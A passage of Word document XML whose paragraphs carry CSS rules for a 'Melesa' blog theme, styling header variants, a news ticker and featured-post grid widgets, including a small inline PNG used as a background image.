    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .navigational-menu .sf-menu &gt; li{margin-bottom: -6px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; a{padding: 0 14px;line-height: 48px;font-size: 14px;color: $darkcolor;font-weight: 500;text-transform: uppercase;-webkit-backface-visibility: hidden; font-family: 'Open Sans', sans-serif;  font-weight: 700;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .sf-menu &gt; li &gt; ul li a{padding: 7px 30px;font-size: 12px;line-height: 20px;color: #111;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .sf-menu &gt; li &gt; ul li a:hover{color:$maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .navigational-menu{width: 100%;text-align:center}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full #header img{margin: 0 auto;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>header.center-full .sf-menu{text-align: center;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">header.center-full .navigational-menu ul.sf-menu  ul li{text-align: left} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .nav-bak{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .navigational-menu{position: relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .navigational-menu .widget{position: static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .static-object{position: static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .static-object ul{margin-top: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.center-full .navigational-menu .sf-menu &gt; li{padding-top:0px;padding-bottom:0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Header Style 5 [Modern] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .header-logo{display: block;min-height: 1px;float: left;width: 272px;position: relative;margin-bottom: 8px;margin-top: 28px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .advertisement-top{float: right;width: 728px;position: relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .h-break,header.modern .n-break{clear: both;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .topnl,header.modern  .topnl ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .topnr ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .topnr{float: right}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern ul{padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern li{list-style-type: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .sf-menu li{position: relative;background:#fff;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu ul{box-shadow: 1px 1px 4px rgba(0,0,0,.15);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .header-cap-bottom,header.modern .clear-header{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .navigational-menu .sf-menu &gt; li{margin-bottom: -6px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; a{padding: 0 14px;line-height: 48px;font-size: 14px;color: $darkcolor;font-weight: 500;text-transform: uppercase;-webkit-backface-visibility: hidden; font-family: 'Open Sans', sans-serif;  font-weight: 700;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; ul li a{padding: 7px 30px;font-size: 12px;line-height: 20px;color: #111;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; ul li a:hover{color:$maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .navigational-menu{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>header.modern .header-outer:before{content: "";background: transparent url("");width: 100%;height: 12px;position: absolute;bottom: -12px;z-index: 1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .nav-bak:before{content: "";background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAAMBAMAAABRpcpkAAAAD1BMVEUAAAAAAAAAAAAAAAAAAABPDueNAAAABXRSTlMGAhQQCyEd++8AAAAUSURBVAjXY1AAQgMgdABCCBAAQQAT6AFRBPHcWgAAAABJRU5ErkJggg==);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>width: 100%;height: 12px;position: absolute;bottom: -12px;z-index: 1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .nav-bak{position: relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .non_responsive{float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .non_responsive ul.sf-menu{margin-bottom: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .nav-bak .container{position:relative;display:block;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .static-object{position: static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .static-object ul{margin-top:0px;position: absolute;top:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.modern .navigational-menu .sf-menu &gt; li{padding-top:0px;padding-bottom:0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Header Style 1 [REGULAR] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .header-logo{display: block;min-height: 1px;float: left;width: 272px;position: relative;margin-bottom: 8px;margin-top: 28px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .advertisement-top{float: right;width: 728px;position: relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .h-break,header.regular .n-break{clear: both;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .topnl,header.regular  .topnl ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .topnr ul li{ float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .topnr{float: right}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular ul{padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular li{list-style-type: none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .topnl a{font-size: 11px;font-weight: 600;padding:4px 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .sf-menu &gt; li:hover &gt; a:before{background-color: $maincolor;width: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .sf-menu li{position: relative;background:#fff;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu ul{box-shadow: 0px 5px 10px 0px rgba(75,77,88,0.39);border-top: 2px solid $maincolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .header-cap-bottom,header.regular .clear-header{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>header.regular .navigational-menu .sf-menu &gt; li{margin-bottom: -10px;padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; a{padding: 0 14px;line-height: 48px;font-size: 14px;color: $linkcolor;font-weight: 500;text-transform: uppercase;-webkit-backface-visibility: hidden; font-family: 'Montserrat', sans-serif;  font-weight: 300;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .sf-menu &gt; li &gt; ul li a{padding: 7px 30px;font-size: 12px;line-height: 20px;color: #000;transition: .2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .sf-menu &gt; li &gt; ul li a:hover{opacity:1;transition: .2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.imglink a{opacity:0.7}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-naver a{border-radius:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .topmenus{}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .topmenus a{opacity:0.7;font-weight:300;transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .topmenus a:hover{opacity:1;transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .topmenus .topnl a{font-weight: 500;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .topmenus .topnl a:hover{color:$maincolor;text-decoration:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .nav-bak{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .megamenu-item{width: 25%;float: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .navigational-menu{position: relative;padding-top: 15px;padding-bottom: 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .navigational-menu .widget{position: static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .static-object{position: static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .static-object ul{margin-top: 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .row-custom &gt; .container:after{clear: nont !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header.regular .search-act a:after{margin-bottom: -4px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* TICKER WIDGET */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#melesa_news{margin-top:10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#melesa_news.loading{display:none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.left .news-ticker-controls,.left .ticker-content,.left .melesa-ticker-title,.left .ticker{float:left}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.right .news-ticker-controls,.right .ticker-content,.right .melesa-ticker-title,.right .ticker{float:right}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.ticker-wrapper.has-js{font-family:'Montserrat',sans-serif;width:100%;height:28px;overflow:hidden;line-height:28px;float:none;color:#252525;position:relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.ticker{position:relative;overflow:hidden;width:100%}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.ticker a{color:$tickercolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-ticker-title{font-size: 12px;text-transform: uppercase;padding: 0 10px;font-weight: bold;border: 2px solid $maincolor;border-radius: 4px;color: $maincolor;line-height:24px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.ticker-content{margin:0;position:absolute;font-weight:600;overflow:hidden;white-space:nowrap;line-height:26px;padding:0 10px;font-size:15px;font-family: 'Open Sans', sans-serif;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.ticker-content .date{display:none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.ticker-content a{font-weight:600;font-family: 'Open Sans', sans-serif;line-height:26px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.rabbi-ticker-swipe{position:absolute;top:0;background-color:#FFFFFF;color:$darkcolor;display:block;width:100%;height:28px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.rabbi-ticker-swipe span{margin-left:1px;background-color:#FFFFFF;color:$darkcolor;height:28px;width:7px;display:block}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.news-ticker-controls{padding:0;margin:0;list-style-type:none;position:absolute;right:5px;top:0}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.news-ticker-controls li{padding:0;margin-left:5px;float:left;cursor:pointer;height:16px;width:16px;display:block}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.news-ticker-controls li{font-family: "Ionicons";position:relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.news-ticker-controls li:before{top:0;line-height:20px;top: 1px;display: block;position:relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.news-ticker-controls li.bs-play-pause{display:none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.news-ticker-controls li.bs-prev:before{content:"\f124";left: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.news-ticker-controls li.bs-next:before{content:"\f125";right: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.js-hidden{display:none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-news .bs-next, .melesa-news .bs-prev{display: inline-block;margin-right: 7px;width: 25px;height: 25px;line-height: 24px;border: 1px solid #dcdcdc;text-align: center;vertical-align: middle;color: #c3c3c9;border-radius:100%;border:1px solid #c3c3c9;transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-news .bs-next:hover, .melesa-news .bs-prev:hover{border-color:$maincolor;color:$maincolor;transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.news-ticker-controls{background:#fff;right:0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Featured Post [GRID 1]*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.melesa-grid .row {flex-wrap: nowrap !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget{margin-bottom: 40px;display: block;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget &gt;.grid-1 &gt; .row &gt; div{padding:0px 8px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget &gt; .grid-1 &gt; .row .row &gt; div{padding:1px 1px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 .first .big,.melesa_widget .first, .melesa_widget .pthumb{height:100%;width:100%;display:table;border-radius:7px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 .first .big{background-size:cover !important;background-position:center center !important;padding:60px 0px;padding-bottom:0px;display:table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 .first{position:relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 .wrapper-post{display:table-cell;vertical-align:bottom;padding:30px 20px;padding-bottom:20px;background:rgba(0, 0, 0, 0) linear-gradient(to bottom, transparent 0%, transparent 0%, rgba(0, 0, 0, 0.5) 100%, rgba(0, 0, 0, 0.1) 100%) repeat scroll 0 0;color:#fff;border-radius:7px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 .wrapper-post a{color:#fff;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 .post-meta{z-index:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 .post-tags a{text-transform:uppercase;font-family:'Roboto',sans-serif;font-size:10px;font-weight:500;text-transform:uppercase;display:inline-block;margin:0 0 5px 0;padding:3px 7px;line-height:13px;pointer-events:auto;background:$maincolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 &gt;.row &gt; .col-sm-6:first-child .post-meta h3 a{font-weight:800;font-size:25px;line-height:34px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 &gt;.row &gt; .col-sm-6:nth-child(2) .post-meta h3 a{font-weight:800;font-size:16px;line-height:18px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-1 &gt;.row &gt; .col-sm-6:nth-child(2) .other-meta{display:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Featured Post [GRID 2]*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget &gt;.grid-2 &gt; .row &gt; div{padding:0px 8px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget &gt; .grid-2 &gt; .row .row &gt; div{padding:1px 1px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 .first .big,.melesa_widget .first, .melesa_widget .pthumb{height:100%;width:100%;display:table;border-radius:7px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 .first .big{background-size:cover !important;background-position:center center !important;padding:60px 0px;padding-bottom:0px;display:table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 .first{position:relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.melesa_widget .grid-2 .wrapper-post{display:table-cell;vertical-align:bottom;padding:30px 20px;padding-bottom:20px;background:rgba(0, 0, 0, 0) linear-gradient(to bottom, transparent 0%, transparent 0%, rgba(0, 0, 0, 0.5) 100%, rgba(0, 0, 0, 0.1) 100%) repeat scroll 0 0;color:#fff;border-radius:7px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 .wrapper-post a{color:#fff;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 .post-meta{z-index:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 .post-tags a{text-transform:uppercase;font-family:'Roboto',sans-serif;font-size:10px;font-weight:500;text-transform:uppercase;display:inline-block;margin:0 0 5px 0;padding:3px 7px;line-height:13px;pointer-events:auto;background:$maincolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 &gt;.row &gt; .col-sm-8 .post-meta h3 a{font-weight:800;font-size:25px;line-height:34px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 &gt;.row &gt; .col-sm-4 .post-meta h3 a{font-weight:800;font-size:16px;line-height:18px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-2 &gt;.row &gt; .col-sm-4 .other-meta{display:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Featured Post [GRID 3]*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget &gt;.grid-3 &gt; .row &gt; div{padding:0px 8px;}</w:t>
      </w:r>
    </w:p>
